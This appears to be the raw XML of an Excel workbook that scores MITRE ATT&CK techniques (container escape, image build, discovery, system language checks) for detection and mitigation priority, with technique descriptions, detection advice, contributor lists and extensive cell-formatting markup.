  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Center for Threat-Informed Defense (CTID); Idan Frimark, Cisco; Magno Logan, @magnologan, Trend Micro; Pawan Kinger, @kingerpawan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</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</si>
  <si>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or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as &lt;code&gt;mount&lt;/code&gt; (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.</t>
  </si>
  <si>
    <t>Containers, Linux, Windows</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Daniel Prizmant, Palo Alto Networks; David Fiser, @anu4is, Trend Micro; Idan Frimark, Cisco; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team; Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>T1612</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</si>
  <si>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then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</si>
  <si>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https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.</t>
  </si>
  <si>
    <t>Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security; Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security; Roi Kol, @roykol1, Team Nautilus Aqua Security; Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>Container and Resource Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t xml:space="preserve">Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.
Monitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. </t>
  </si>
  <si>
    <t xml:space="preserve">
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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614</t>
  </si>
  <si>
    <t>01 April 2021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</si>
  <si>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location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling &lt;code&gt; GetLocaleInfoW&lt;/code&gt; to gather information.(Citation: FBI Ragnar Locker 2020)
Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.</t>
  </si>
  <si>
    <t>Hiroki Nagahama, NEC Corporation; Katie Nickels, Red Canary; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India; Wes Hurd</t>
  </si>
  <si>
    <t>System Location Discovery: System Language Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)
There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) 
For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language&lt;/code&gt; or parsing the outputs of Windows API functions &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetSystemDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; and &lt;code&gt;GetUserDefaultLangID&lt;/code&gt;.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)
On a macOS or Linux system, adversaries may query &lt;code&gt;locale&lt;/code&gt; to retrieve the value of the &lt;code&gt;$LANG&lt;/code&gt; environment variable.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614/001</t>
  </si>
  <si>
    <t>18 August 2021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</si>
  <si>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</si>
  <si>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Harshal Tupsamudre, Qualys</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</si>
  <si>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predicable network path &lt;code&gt;\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\&lt;/code&gt;.(Citation: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</si>
  <si>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https://attack.mitre.org/techniques/T1615</t>
  </si>
  <si>
    <t>06 August 2021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</si>
  <si>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</si>
  <si>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Jonhnathan Ribeiro, 3CORESec, @_w0rk3r; Ted Samuels, Rapid7</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1619</t>
  </si>
  <si>
    <t>01 October 2021</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</si>
  <si>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cloud logs for API calls used for file or object enumeration for unusual activity. </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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1620</t>
  </si>
  <si>
    <t>01 November 2021</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</si>
  <si>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</si>
  <si>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Joas Antonio dos Santos, @C0d3Cr4zy; João Paulo de A. Filho, @Hug1nN__; Lior Ribak, SentinelOne; Rex Guo, @Xiaofei_REX, Confluera; Shlomi Salem, SentinelOne</t>
  </si>
  <si>
    <t>Parameter Name</t>
  </si>
  <si>
    <t>Explanation</t>
  </si>
  <si>
    <t>Value</t>
  </si>
  <si>
    <t>Actionability</t>
  </si>
  <si>
    <t>mitigations lower cutoff</t>
  </si>
  <si>
    <t>The lowest number of mitigations that contributes to actionability</t>
  </si>
  <si>
    <t>w_miti'</t>
  </si>
  <si>
    <t>mitigations upper cutoff</t>
  </si>
  <si>
    <t>The highest number of mitigations that contributes to actionabilty</t>
  </si>
  <si>
    <t>w_detect'</t>
  </si>
  <si>
    <t>detections lower cutoff</t>
  </si>
  <si>
    <t>The lowest number of detections that contributes to actionability</t>
  </si>
  <si>
    <t>w_miti</t>
  </si>
  <si>
    <t>=</t>
  </si>
  <si>
    <t>detections upper cutoff</t>
  </si>
  <si>
    <t>The highest number of detections that contributes to actionabilty</t>
  </si>
  <si>
    <t>w_detect</t>
  </si>
  <si>
    <t>mitigations-to-detections ratio</t>
  </si>
  <si>
    <t>Chokepoint</t>
  </si>
  <si>
    <t>before lower cutoff</t>
  </si>
  <si>
    <t>w_before'</t>
  </si>
  <si>
    <t>before upper cutoff</t>
  </si>
  <si>
    <t>w_after'</t>
  </si>
  <si>
    <t>after lower cutoff</t>
  </si>
  <si>
    <t>w_before</t>
  </si>
  <si>
    <t>after upper cutoff</t>
  </si>
  <si>
    <t>w_after</t>
  </si>
  <si>
    <t>before-to-after ratio</t>
  </si>
  <si>
    <t>t_now</t>
  </si>
  <si>
    <t>full</t>
  </si>
  <si>
    <t>decline</t>
  </si>
  <si>
    <t>w_min</t>
  </si>
  <si>
    <t>Ransomware (Utillity)</t>
  </si>
  <si>
    <t>tat lower cutoff</t>
  </si>
  <si>
    <t>w_tat'</t>
  </si>
  <si>
    <t>tat upper cutoff</t>
  </si>
  <si>
    <t>w_count'</t>
  </si>
  <si>
    <t>count lower cutoff</t>
  </si>
  <si>
    <t>w_tat</t>
  </si>
  <si>
    <t>count upper cutoff</t>
  </si>
  <si>
    <t>w_count</t>
  </si>
  <si>
    <t>tat-to-count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</si>
</sst>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E+00"/>
  </numFmts>
  <fonts count="21">
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF444444"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF444444"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFFFFFF"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF006100"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>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
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF9C5700"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="16"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FF9C5700"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="18">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9E1F2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7030A0"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF404040"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5"/>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7" tint="0.79998168889431442"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC000"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF305496"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFEB9C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor rgb="FFD9D9D9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="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theme="1"/>
      </top>
      <bottom style="thin">
        <color theme="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="5">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="9" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="top"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="79">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="6" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="6" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="2"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="2" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="3" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="7" borderId="7" xfId="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="9" fillId="7" borderId="8" xfId="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="9" fillId="7" borderId="9" xfId="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0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="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12" borderId="15" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="12" borderId="16" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="12" borderId="17" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="164" fontId="15" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="23" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="1" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="15" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="15" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="15" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="15" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="15" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="15" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="15" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="2" fontId="2" fillId="15" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="16" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="15" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="16" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="16" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="15" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="15" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="15" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="2" fillId="16" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="14" fontId="0" fillId="15" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="17" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="20" fillId="14" borderId="0" xfId="4" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="13" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="5" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="18" xfId="0" applyFont="1" applyBorder="1"/>
  </cellXfs>
  <cellStyles count="5">
    <cellStyle name="Good" xfId="1" builtinId="26"/>
    <cellStyle name="Hyperlink 2" xfId="3" xr:uid="{3AA4B3EF-D78B-AB4A-B334-8EBB52A2930F}"/>
    <cellStyle name="Neutral" xfId="4" builtinId="28"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Normal 2" xfId="2" xr:uid="{6C0BDFEF-4B8F-A247-80EF-9C2D2966FA8B}"/>
  </cellStyles>
  <dxfs count="49">
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <alignment horizontal="left" vertical="top" textRotation="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF000000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fil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fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="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fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="left" vertical="top" textRotation="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indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
